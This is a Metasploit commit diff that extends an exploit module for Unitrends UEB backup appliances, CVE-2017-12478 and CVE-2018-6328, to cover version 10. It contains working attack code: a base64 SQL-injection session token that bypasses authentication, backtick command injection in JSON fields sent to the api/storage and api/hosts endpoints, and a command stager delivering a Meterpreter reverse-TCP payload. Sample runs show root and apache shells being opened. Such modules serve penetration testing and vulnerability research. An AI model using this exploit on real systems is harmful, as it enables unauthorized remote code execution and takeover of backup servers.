Land #10616, update Unitrends UEB module to support vulnerabilities i…

…n version 10

documentation/modules/exploit/linux/http/ueb_api_rce.md

@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This exploit leverages a sqli vulnerability for authentication bypass,
+together with command injection for subsequent RCE.
+
+This exploit has two targets:
+
+  1. Unitrends UEB 9 http api/storage RCE for root privileges
+  2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/ueb_api_rce```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```set target [#]```
+  5. ```exploit```
+  6. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce 
+msf5 exploit(linux/http/ueb_api_rce) > set target 0
+target => 0
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress -  19.76% done (164/830 bytes)
+[*] Command Stager progress -  39.16% done (325/830 bytes)
+[*] Command Stager progress -  56.87% done (472/830 bytes)
+[*] Command Stager progress -  74.82% done (621/830 bytes)
+[*] Command Stager progress -  92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
+
+meterpreter > sysinfo
+Computer     : 1.1.1.1
+OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce 
+msf5 exploit(linux/http/ueb_api_rce) > set target 1
+target => 1
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress -  19.76% done (164/830 bytes)
+[*] Command Stager progress -  39.16% done (325/830 bytes)
+[*] Command Stager progress -  56.87% done (472/830 bytes)
+[*] Command Stager progress -  74.82% done (621/830 bytes)
+[*] Command Stager progress -  92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+
+meterpreter > sysinfo
+Computer     : 1.1.1.1
+OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter > shell
+Process 25534 created.
+Channel 1 created.
+whoami
+apache
+```

modules/exploits/linux/http/ueb9_api_storage.rb → modules/exploits/linux/http/ueb_api_rce.rb

@@ -11,18 +11,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Unitrends UEB 9 http api/storage remote root',
+      'Name'           => 'Unitrends UEB http api remote code execution',
       'Description'    => %q{
         It was discovered that the api/storage web interface in Unitrends Backup (UB)
         before 10.0.0 has an issue in which one of its input parameters was not validated.
         A remote attacker could use this flaw to bypass authentication and execute arbitrary
         commands with root privilege on the target system.
+        UEB v9 runs the api under root privileges and api/storage is vulnerable.
+        UEB v10 runs the api under limited privileges and api/hosts is vulnerable.
       },
       'Author'         =>
         [
           'Cale Smith',    # @0xC413
           'Benny Husted', # @BennyHusted
-          'Jared Arave'   # @iotennui
+          'Jared Arave',   # @iotennui
+          'h00die'
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => 'linux',
@@ -31,14 +34,18 @@ def initialize(info = {})
       'References'     =>
         [
           ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
+          ['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'],
+          ['EDB', '44297'],
           ['CVE', '2017-12478'],
+          ['CVE', '2018-6328']
         ],
       'Targets'        =>
         [
-          [ 'UEB 9.*', { } ]
+          [ 'UEB 9.*', { 'Privileged' => true} ],
+          [ 'UEB < 10.1.0', { 'Privileged' => false} ]
         ],
-      'Privileged'     => true,
       'DefaultOptions' => {
           'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
           'SSL' => true
@@ -53,30 +60,56 @@ def initialize(info = {})
     deregister_options('SRVHOST', 'SRVPORT')
   end
 
+  def auth_token
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    Base64.strict_encode64(session) #b64 encode session token
+  end
+
+  def check
+    res = send_request_cgi!({
+        'method' => 'GET',
+        'uri'    => '/api/systems/details',
+        'ctype'  => 'application/json',
+        'headers' =>
+        {'AuthToken' => auth_token}
+      })
+    if res && res.code == 200
+      print_good("Good news, looks like a vulnerable version of UEB.")
+      return CheckCode::Appears
+    else
+      print_bad('Host does not appear to be vulnerable.')
+    end
+    return CheckCode::Safe
+  end
+
   #substitue some charactes
   def filter_bad_chars(cmd)
     cmd.gsub!("\\", "\\\\\\")
     cmd.gsub!("'", '\\"')
   end
 
   def execute_command(cmd, opts = {})
-    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
-    session = Base64.strict_encode64(session) #b64 encode session token
-
-    #substitue the cmd into the hostname parameter
-    parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
-    parms << filter_bad_chars(cmd)
-    parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
-
+    if target.name == 'UEB 9.*'
+      #substitue the cmd into the hostname parameter
+      parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
+      parms << filter_bad_chars(cmd)
+      parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
+      uri = '/api/storage'
+    elsif target.name == 'UEB < 10.1.0'
+      parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&|
+      parms << filter_bad_chars(cmd)
+      parms << %Q|`'"}|
+      uri = '/api/hosts'
+    end
 
     res = send_request_cgi({
-      'uri' => '/api/storage',
+      'uri' => uri,
       'method' => 'POST',
       'ctype'  => 'application/json',
       'encode_params' => false,
       'data'   => parms,
       'headers' =>
-        {'AuthToken' => session}
+        {'AuthToken' => auth_token}
     })
 
     if res && res.code != 500
@@ -87,7 +120,8 @@ def execute_command(cmd, opts = {})
   end
 
   def exploit
-    print_status("#{peer} - pwn'ng ueb 9....")
+    print_status("#{peer} - Sending requests to UEB...")
     execute_cmdstager(:linemax => 120)
   end
 end
+